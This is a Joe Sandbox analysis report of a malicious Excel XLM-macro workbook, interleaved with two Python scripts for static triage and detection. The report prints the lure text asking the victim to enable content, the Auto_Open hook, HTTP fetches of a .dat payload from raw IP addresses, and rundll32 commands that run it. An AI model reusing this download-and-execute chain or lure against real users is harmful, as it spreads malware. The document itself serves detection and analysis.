Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe
Source: global traffic | DNS query: name: 44293.7276049768.dat
Source: global traffic | TCP traffic: 192.168.2.22:49169 -> 188.119.112.114:80
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 188.127.230.104:80
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | DNS query: 44293.7276049768.dat is down
Source: Joe Sandbox View | IP Address: 188.119.112.114
Source: Joe Sandbox View | IP Address: 188.127.230.104
Source: unknown | DNS traffic detected: query: 44293.7276049768.dat reply code: Name error (3, NXDOMAIN)
Source: global traffic | HTTP traffic detected:
  GET /44293.7276049768.dat HTTP/1.1
  Accept: */*
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: 188.119.112.114
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  GET /44293.7276049768.dat HTTP/1.1
  Accept: */*
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: 185.82.219.75
  Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 188.127.230.104 (6 entries)
Source: unknown | TCP traffic detected without corresponding DNS query: 188.119.112.114 (6 entries)
Source: unknown | TCP traffic detected without corresponding DNS query: 185.82.219.75 (6 entries)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A4B9C4AC.jpeg
Source: rundll32.exe, 00000004.00000002.2205313845.0000000001CB0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2202746600.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2196756284.0000000001C80000.00000002.00000001.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown | DNS traffic detected: queries for: 44293.7276049768.dat
Source: rundll32.exe, 00000004.00000002.2205313845.0000000001CB0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2202746600.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2196756284.0000000001C80000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000004.00000002.2205313845.0000000001CB0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2202746600.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2196756284.0000000001C80000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000004.00000002.2205780989.0000000001E97000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2203001284.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2196966201.0000000001E67000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000004.00000002.2205780989.0000000001E97000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2203001284.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2196966201.0000000001E67000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000004.00000002.2205780989.0000000001E97000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2203001284.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2196966201.0000000001E67000.00000002.00000001.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000004.00000002.2205780989.0000000001E97000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2203001284.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2196966201.0000000001E67000.00000002.00000001.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000004.00000002.2205313845.0000000001CB0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2202746600.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2196756284.0000000001C80000.00000002.00000001.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000004.00000002.2205780989.0000000001E97000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2203001284.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2196966201.0000000001E67000.00000002.00000001.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000004.00000002.2205313845.0000000001CB0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2202746600.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2196756284.0000000001C80000.00000002.00000001.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000006.00000002.2196756284.0000000001C80000.00000002.00000001.sdmp | String found in binary or memory: http://www.windows.com/pctv.
Source: Screenshot number: 4 | Screenshot OCR: Enable editing button from the yellow bar above Onoe you have enabled editing. please click Enabl
Source: Screenshot number: 4 | Screenshot OCR: Enable Content bytton from the yellow bar above R jnMl Rr ;r'j i m m RunDLL |~| ,0 There was a
Source: Screenshot number: 8 | Screenshot OCR: Enable editing button from the yellow bar above 12 " Onoe you have enabled editing. please click En
Source: Screenshot number: 8 | Screenshot OCR: Enable Content bytton from the yellow bar above 13 14 15 16 17 18 19 20 21 22 23 24 25
Source: Document image extraction number: 1 | Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled edding, please click Enable
Source: Document image extraction number: 1 | Screenshot OCR: Enable Content bytton from the yellow bar above
Source: Screenshot number: 12 | Screenshot OCR: Enable editing button from the yellow bar above 12 " Onoe you have enabled editing. please click En
Source: Screenshot number: 12 | Screenshot OCR: Enable Content bytton from the yellow bar above 13 14 15 16 17 18 19 20 21 22 23 24 25
Source: Comission_1980420924_03172021.xlsm | Initial sample: EXEC
Source: Comission_1980420924_03172021.xlsm | Initial sample: Sheet size: 19220
Source: workbook.xml | Binary string:
<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"
          xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"
          xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15 xr xr6 xr10 xr2"
          xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"
          xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision"
          xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6"
          xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10"
          xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2">
  <fileVersion appName="xl" lastEdited="7" lowestEdited="7" rupBuild="22730"/>
  <workbookPr/>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
    <mc:Choice Requires="x15">
      <x15ac:absPath url="E:\Nowiy\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{E74EC3A0-E6C1-4379-B2DF-09ED883A9632}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="-108" yWindow="-108" windowWidth="20376" windowHeight="12360" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="sheet" sheetId="1" r:id="rId1"/>
    <sheet name="sheet1" sheetId="2" r:id="rId2"/>
    <sheet name="sheet2" sheetId="8" r:id="rId3"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm.Auto_Open">sheet1!$AO$168</definedName>
  </definedNames>
  <calcPr calcId="162913"/>
</workbook>
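The `_xlnm.Auto_Open` defined name above is the Excel 4.0 (XLM) auto-start hook: once the user clicks Enable Content, as the lure image asks, Excel runs the macro formulas beginning at cell AO168 of "sheet1" with no VBA involved. The following script is an added example (not part of the Joe Sandbox report or of the sample) that pulls that fact out of an .xlsm statically. The workbook.xml it parses is the one the report extracted; the [Content_Types].xml and workbook.xml.rels parts, the macro-sheet part name and the relationship ids are constructed so the example runs offline, and every function name is the example's own.

```python
"""Static triage of an .xlsm for an Excel 4.0 (XLM) auto-start macro.

Added example, not part of the Joe Sandbox report or of the sample. The
workbook.xml is the one the report extracted from the sample; the
[Content_Types].xml and workbook.xml.rels parts are constructed so the
example runs offline, and every function name here is the example's own.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

NS = {
    "m": "http://schemas.openxmlformats.org/spreadsheetml/2006/main",
    "r": "http://schemas.openxmlformats.org/officeDocument/2006/relationships",
    "ct": "http://schemas.openxmlformats.org/package/2006/content-types",
    "pr": "http://schemas.openxmlformats.org/package/2006/relationships",
}
# Content type Excel gives XLM macro-sheet parts (xl/macrosheets/*.xml).
MACROSHEET_CT = "application/vnd.ms-excel.macrosheet+xml"
# Built-in names Excel runs without any VBA; "_xlnm." marks a built-in name.
AUTO_NAME = re.compile(r"^(_xlnm\.)?auto_(open|close)$", re.I)

# xl/workbook.xml as extracted by the sandbox (line-wrapped only).
WORKBOOK_XML = rb"""<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"
 xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"
 xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15 xr xr6 xr10 xr2"
 xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"
 xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision"
 xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6"
 xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10"
 xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2">
<fileVersion appName="xl" lastEdited="7" lowestEdited="7" rupBuild="22730"/><workbookPr/>
<mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"><mc:Choice Requires="x15">
<x15ac:absPath url="E:\Nowiy\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent>
<xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{E74EC3A0-E6C1-4379-B2DF-09ED883A9632}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
<bookViews><workbookView xWindow="-108" yWindow="-108" windowWidth="20376" windowHeight="12360" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews>
<sheets><sheet name="sheet" sheetId="1" r:id="rId1"/><sheet name="sheet1" sheetId="2" r:id="rId2"/><sheet name="sheet2" sheetId="8" r:id="rId3"/></sheets>
<definedNames><definedName name="_xlnm.Auto_Open">sheet1!$AO$168</definedName></definedNames>
<calcPr calcId="162913"/></workbook>"""

# Constructed companion parts: the report lists only some zip paths, so the
# macro-sheet part name and relationship ids below are assumptions.
CONTENT_TYPES_XML = rb"""<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
<Default Extension="xml" ContentType="application/xml"/>
<Override PartName="/xl/workbook.xml" ContentType="application/vnd.ms-excel.sheet.macroEnabled.main+xml"/>
<Override PartName="/xl/worksheets/sheet1.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
<Override PartName="/xl/macrosheets/sheet1.xml" ContentType="application/vnd.ms-excel.macrosheet+xml"/>
</Types>"""
WORKBOOK_RELS = rb"""<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet" Target="worksheets/sheet1.xml"/>
<Relationship Id="rId2" Type="http://schemas.microsoft.com/office/2006/relationships/xlMacrosheet" Target="macrosheets/sheet1.xml"/>
<Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet" Target="worksheets/sheet2.xml"/>
</Relationships>"""
# A clean workbook with no auto-start name, for comparison (constructed).
CLEAN_WORKBOOK_XML = rb"""<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"
 xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
<sheets><sheet name="Sheet1" sheetId="1" r:id="rId1"/></sheets></workbook>"""


def build_sample_xlsm(workbook_xml=WORKBOOK_XML) -> bytes:
    """Pack the parts into a minimal OOXML zip so triage_xlsm can read it."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", CONTENT_TYPES_XML)
        z.writestr("xl/workbook.xml", workbook_xml)
        z.writestr("xl/_rels/workbook.xml.rels", WORKBOOK_RELS)
    return buf.getvalue()


def triage_xlsm(data: bytes) -> dict:
    """Report XLM macro-sheet parts and auto-start defined names in an .xlsm."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        types = ET.fromstring(z.read("[Content_Types].xml"))
        wb = ET.fromstring(z.read("xl/workbook.xml"))
        rels = ET.fromstring(z.read("xl/_rels/workbook.xml.rels"))
    macrosheets = [o.get("PartName") for o in types.findall("ct:Override", NS)
                   if o.get("ContentType") == MACROSHEET_CT]
    rid_to_target = {r.get("Id"): r.get("Target") for r in rels.findall("pr:Relationship", NS)}
    # Map sheet names to their parts so an Auto_Open ref can be tied to a macro sheet.
    sheet_target = {s.get("name"): rid_to_target.get(s.get("{%s}id" % NS["r"]))
                    for s in wb.findall("m:sheets/m:sheet", NS)}
    auto_names = []
    for dn in wb.findall("m:definedNames/m:definedName", NS):
        name = dn.get("name", "")
        if not AUTO_NAME.match(name):
            continue
        ref = (dn.text or "").strip()          # e.g. sheet1!$AO$168
        sheet = ref.split("!")[0].strip("'")   # quoted when the sheet name has spaces
        auto_names.append({"name": name, "ref": ref, "sheet": sheet,
                           "hidden": dn.get("hidden") == "1",
                           "target": sheet_target.get(sheet)})
    return {"macrosheets": macrosheets, "auto_names": auto_names,
            "suspicious": bool(auto_names) and bool(macrosheets)}


if __name__ == "__main__":
    print(triage_xlsm(build_sample_xlsm()))
```

The verdict deliberately requires both an auto-start name and a macro-sheet part: a workbook can carry `Auto_Open` for legitimate reasons, and a macro sheet can exist without an auto-start name, but the pair is what makes a document run XLM code on open. On a real sample, also check the `hidden` flag on the defined name and the `state` attribute of the target `<sheet>`, since lure documents usually hide the macro sheet from the user.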
Source: rundll32.exe, 00000004.00000002.2205313845.0000000001CB0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2202746600.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2196756284.0000000001C80000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
Source: classification engine | Classification label: mal68.troj.expl.evad.winXLSM@7/7@2/3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$Comission_1980420924_03172021.xlsm
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRDD05.tmp
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe Rundll32 ..\Kiod.hod,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe Rundll32 ..\Kiod.hod1,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe Rundll32 ..\Kiod.hod2,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe | Automated click: OK (3 entries)
Source: Window Recorder | Window detected: More than 3 window changes detected
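Two behaviours in this report are reliable detection hooks regardless of the payload: EXCEL.EXE launching rundll32.exe on a relative-path module with a non-.dll extension (Kiod.hod, Kiod.hod1, Kiod.hod2) through the DllRegisterServer export, and an HTTP GET for /44293.7276049768.dat to a raw-IP host that was never resolved through DNS. The script below is an added example, not sandbox output, that runs both detections over event records constructed from the values in the report (with one benign control of each kind); the field names, the two-trait threshold for the download rule and the function names are the example's own.

```python
"""Detection logic for two behaviours in the report: EXCEL.EXE launching
rundll32 on a non-.dll module through DllRegisterServer, and an HTTP GET for
a /<digits>.<digits>.dat payload from a raw-IP host with no preceding DNS query.

Added example, not sandbox output. The event records are constructed from
values in the report; field names, thresholds and function names are the
example's own.
"""
import ipaddress
import re
from pathlib import PureWindowsPath

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
# "Rundll32 <module>,<export> ..." with or without a path or .exe on the binary.
RUNDLL_RE = re.compile(
    r'^\s*"?(?:.*\\)?rundll32(?:\.exe)?"?\s+(?P<module>"[^"]+"|[^\s,]+),(?P<export>\w+)', re.I)
PAYLOAD_PATH_RE = re.compile(r"^/\d+\.\d+\.dat$")

# Constructed events mirroring the report; the last of each kind is a benign control.
SAMPLE_EVENTS = [
    {"type": "process", "parent": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "cmdline": r"Rundll32 ..\Kiod.hod,DllRegisterServer"},
    {"type": "process", "parent": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "cmdline": r"Rundll32 ..\Kiod.hod1,DllRegisterServer"},
    {"type": "process", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"type": "http", "host": "188.119.112.114", "path": "/44293.7276049768.dat", "dns_seen": False},
    {"type": "http", "host": "185.82.219.75", "path": "/44293.7276049768.dat", "dns_seen": False},
    {"type": "http", "host": "www.example.com", "path": "/index.html", "dns_seen": True},
]


def rundll32_alert(parent_image: str, cmdline: str):
    """Alert on rundll32 spawned by an Office app with a loader-style argument."""
    m = RUNDLL_RE.match(cmdline)
    if not m or PureWindowsPath(parent_image).name.lower() not in OFFICE_IMAGES:
        return None
    module = PureWindowsPath(m.group("module").strip('"'))
    reasons = []
    if module.suffix.lower() != ".dll":
        reasons.append("module extension %r is not .dll" % (module.suffix or ""))
    if not module.is_absolute():
        reasons.append("module addressed by relative path")
    if m.group("export").lower() == "dllregisterserver":
        reasons.append("DllRegisterServer export used as entry point")
    if not reasons:
        return None
    return {"kind": "rundll32", "parent": parent_image, "module": str(module),
            "export": m.group("export"), "reasons": reasons}


def download_alert(host: str, path: str, dns_seen: bool):
    """Alert when at least two payload-fetch traits coincide on one request."""
    reasons = []
    try:
        ipaddress.ip_address(host.rsplit(":", 1)[0])
        reasons.append("Host header is a literal IP address")
    except ValueError:
        pass
    if PAYLOAD_PATH_RE.match(path):
        reasons.append("path matches /<digits>.<digits>.dat")
    if not dns_seen:
        reasons.append("no DNS query preceded the connection")
    if len(reasons) < 2:
        return None
    return {"kind": "download", "host": host, "path": path, "reasons": reasons}


def scan(events):
    """Run both detections over a list of event dicts and collect alerts."""
    alerts = []
    for ev in events:
        if ev["type"] == "process":
            hit = rundll32_alert(ev["parent"], ev["cmdline"])
        else:
            hit = download_alert(ev["host"], ev["path"], ev["dns_seen"])
        if hit:
            alerts.append(hit)
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(a["kind"], "|", "; ".join(a["reasons"]))
```

The process rule keys on the parent being an Office application rather than on the file name, because the module name (Kiod.hod here) changes per campaign while "Office spawns rundll32 on something that is not a .dll" does not. The download rule needs two traits so that a lone raw-IP fetch from an internal tool does not fire; the no-DNS trait is the one the sandbox itself flagged ("TCP traffic detected without corresponding DNS query").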
Source: Comission_1980420924_03172021.xlsm | Initial sample: OLE zip file path = xl/drawings/drawing2.xml
Source: Comission_1980420924_03172021.xlsm | Initial sample: OLE zip file path = xl/drawings/drawing3.xml
Source: Comission_1980420924_03172021.xlsm | Initial sample: OLE zip file path = xl/drawings/_rels/drawing2.xml.rels
Source: Comission_1980420924_03172021.xlsm | Initial sample: OLE zip file path = xl/drawings/_rels/drawing3.xml.rels
Source: Comission_1980420924_03172021.xlsm | Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX (27 entries)
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX (3 entries)